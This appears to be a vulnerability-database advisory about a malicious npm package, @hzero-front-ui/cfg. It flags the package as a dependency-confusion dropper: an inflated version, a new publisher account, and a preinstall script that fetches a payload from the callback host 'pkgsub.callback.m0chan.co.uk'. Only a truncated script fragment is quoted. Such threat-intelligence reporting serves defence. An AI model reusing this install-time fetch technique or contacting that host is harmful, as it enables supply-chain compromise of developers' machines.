VDB
GCVE-110-OSM-2026-10549
GCVE-110-OSM-2026-10549
Advisory PublishedCVSS 9.6/10
This looks like a dependency-confusion dropper uploaded by a pentest-style publisher: the version is artificially inflated to 99.99.99, the account is brand new, and the package has no repository while being named like an internal namespace. The decisive indicator is the preinstall script in package.json that references a callback host, `pkgsub.callback.m0chan.co.uk`, with a fetched payload URL containing `$b64`, which is consistent with an attacker-controlled install-time fetch. That attacker model is a compromise of internal-package trust, aiming to get code executed during dependency resolution rather than to provide a legitimate library. The empty `index.js` export reinforces that the real behavior lives in install-time logic, not the module entrypoint.
ENTRY
index.js (main: index.js)
- Preinstall Script in package.json: ""preinstall": "b64=$(printf '%s' \""
DESTINATION
- 2 fetched-payload (urls, domains)
(values recorded in verified_iocs)
ADDITIONAL FINDINGS
- Brand New Package
- Very New NPM Publisher Account
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @hzero-front-ui/cfg | all (affected) | — |
Aliases
Browse GCVE Records
3,587 records in the GCVE database · Updated September 5, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.